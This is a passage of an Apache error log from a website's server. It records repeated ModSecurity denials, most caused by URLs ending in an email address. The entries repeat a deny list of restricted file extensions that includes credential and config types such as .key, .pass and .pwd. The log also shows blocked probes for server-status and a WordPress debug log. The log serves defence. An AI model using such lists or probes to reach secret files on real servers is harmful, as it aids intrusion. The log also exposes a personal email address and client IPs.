"elavocato.net"] [uri "/ar/mahmoudsaberabouhelwa@gmail.com"] [unique_id "actEz_khltFjKKfZYNrdNgAAAEE"], referer: http://elavocato.net/ar/about-us [Tue Mar 31 05:52:04.994106 2026] [:error] [pid 31120:tid 31163] [client 139.99.237.180:50806] [client 139.99.237.180] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/ar/service/mahmoudsaberabouhelwa@gmail.com"] [unique_id "actE5PkhltFjKKfZYNrd3gAAAEQ"], referer: http://elavocato.net/ar/service/1 [Tue Mar 31 05:52:10.954708 2026] [:error] [pid 31120:tid 31164] [client 139.99.237.180:52210] [client 139.99.237.180] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/en/mahmoudsaberabouhelwa@gmail.com"] [unique_id "actE6vkhltFjKKfZYNreDwAAAEU"], referer: http://elavocato.net/en/about-us [Tue Mar 31 05:52:21.658250 2026] [:error] [pid 17652:tid 17669] [client 139.99.237.180:47772] [client 139.99.237.180] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/en/service/mahmoudsaberabouhelwa@gmail.com"] [unique_id "actE9Ynk3MwsKtJsLXrVIQAAAc8"], referer: http://elavocato.net/en/service/2 [Tue Mar 31 06:19:39.672257 2026] [:error] [pid 31120:tid 31172] [client 139.99.237.180:59220] [client 139.99.237.180] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/mahmoudsaberabouhelwa@gmail.com"] [unique_id "actLW_khltFjKKfZYNoKngAAAEw"] [Tue Mar 31 06:37:29.316446 2026] [:error] [pid 31120:tid 31172] [client 139.99.237.180:56430] [client 139.99.237.180] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/ar/mahmoudsaberabouhelwa@gmail.com"] [unique_id "actPifkhltFjKKfZYNosZQAAAEw"] [Tue Mar 31 06:53:09.989551 2026] [:error] [pid 17621:tid 17636] [client 139.99.237.180:45996] [client 139.99.237.180] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/ar/service/mahmoudsaberabouhelwa@gmail.com"] [unique_id "actTNW1l7_33f9qljJDVzgAAAY0"] [Tue Mar 31 06:57:10.051903 2026] [:error] [pid 17652:tid 17663] [client 139.99.237.180:47336] [client 139.99.237.180] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/en/mahmoudsaberabouhelwa@gmail.com"] [unique_id "actUJonk3MwsKtJsLXoh8AAAAck"] [Tue Mar 31 07:05:47.351083 2026] [:error] [pid 17652:tid 17659] [client 139.99.237.180:52208] [client 139.99.237.180] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/en/service/mahmoudsaberabouhelwa@gmail.com"] [unique_id "actWK4nk3MwsKtJsLXordAAAAcU"] [Tue Mar 31 20:39:44.229386 2026] [authz_host:error] [pid 17652:tid 17664] [client 93.123.109.180:58464] AH01753: access check of 'localhost' to /server-status failed, reason: unable to get the remote host name [Tue Mar 31 20:39:44.229409 2026] [authz_core:error] [pid 17652:tid 17664] [client 93.123.109.180:58464] AH01630: client denied by server configuration: /home/mysuits1/alavocato.mysuits.app/public/server-status [Tue Mar 31 20:39:45.805492 2026] [:error] [pid 17584:tid 17595] [client 93.123.109.180:58752] [client 93.123.109.180] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/wp-content/debug.log"] [unique_id "acwU8eEwoDguj4d-mkk5UwAAAUM"] [Wed Apr 01 11:49:43.318542 2026] [:error] [pid 3434:tid 3504] [client 62.84.185.69:39022] [client 62.84.185.69] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/mahmoudsaberabouhelwa@gmail.com"] [unique_id "aczqNyTxVgqLorb9Avga2wAAAA8"] [Wed Apr 01 13:41:07.654372 2026] [:error] [pid 3437:tid 3525] [client 51.195.103.76:58310] [client 51.195.103.76] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/ar/about-us/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac0EU2c0odzVMFZ-9PYuDwAAAEY"] [Wed Apr 01 13:41:09.327239 2026] [:error] [pid 3437:tid 3527] [client 51.195.103.76:58312] [client 51.195.103.76] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/ar/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac0EVWc0odzVMFZ-9PYuIwAAAEg"] [Wed Apr 01 13:41:14.052915 2026] [:error] [pid 26573:tid 26589] [client 51.195.103.76:27914] [client 51.195.103.76] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/ar/service/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac0EWldSgxBhwPw1Ebp9vgAAAQY"] [Wed Apr 01 15:28:27.322003 2026] [:error] [pid 3437:tid 3523] [client 54.37.84.47:34632] [client 54.37.84.47] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/en/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac0de2c0odzVMFZ-9PbTmAAAAEQ"] [Wed Apr 01 15:28:44.827005 2026] [:error] [pid 30524:tid 30559] [client 54.37.84.47:34638] [client 54.37.84.47] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/en/service/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac0djGsH25ndavKe06Cg9AAAAcc"] [Wed Apr 01 15:54:42.817101 2026] [:error] [pid 30525:tid 30602] [client 88.216.68.253:13130] [client 88.216.68.253] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac0jot7qKehqmSTZQxycSwAAAg0"] [Wed Apr 01 15:54:43.479251 2026] [:error] [pid 3437:tid 3519] [client 88.216.68.253:13108] [client 88.216.68.253] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/ar/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac0jo2c0odzVMFZ-9Pb9lwAAAEA"] [Wed Apr 01 15:54:43.726853 2026] [:error] [pid 30524:tid 30576] [client 88.216.68.253:13120] [client 88.216.68.253] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/ar/service/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac0jo2sH25ndavKe06C3EAAAAdg"] [Wed Apr 01 15:54:45.322727 2026] [:error] [pid 3437:tid 3523] [client 88.216.68.253:13100] [client 88.216.68.253] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/en/service/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac0jpWc0odzVMFZ-9Pb9qgAAAEQ"] [Wed Apr 01 15:54:45.664725 2026] [:error] [pid 30525:tid 30609] [client 88.216.68.253:13006] [client 88.216.68.253] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/en/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac0jpd7qKehqmSTZQxyccwAAAhQ"] [Wed Apr 01 17:20:16.483265 2026] [:error] [pid 30525:tid 30594] [client 74.7.243.209:53350] [client 74.7.243.209] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac03sN7qKehqmSTZQxwNcgAAAgU"], referer: https://elavocato.net/ [Wed Apr 01 17:20:21.971348 2026] [:error] [pid 30524:tid 30569] [client 74.7.243.209:53360] [client 74.7.243.209] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/ar/mahmoudsaberabouhelwa@gmail.com"] [unique_id 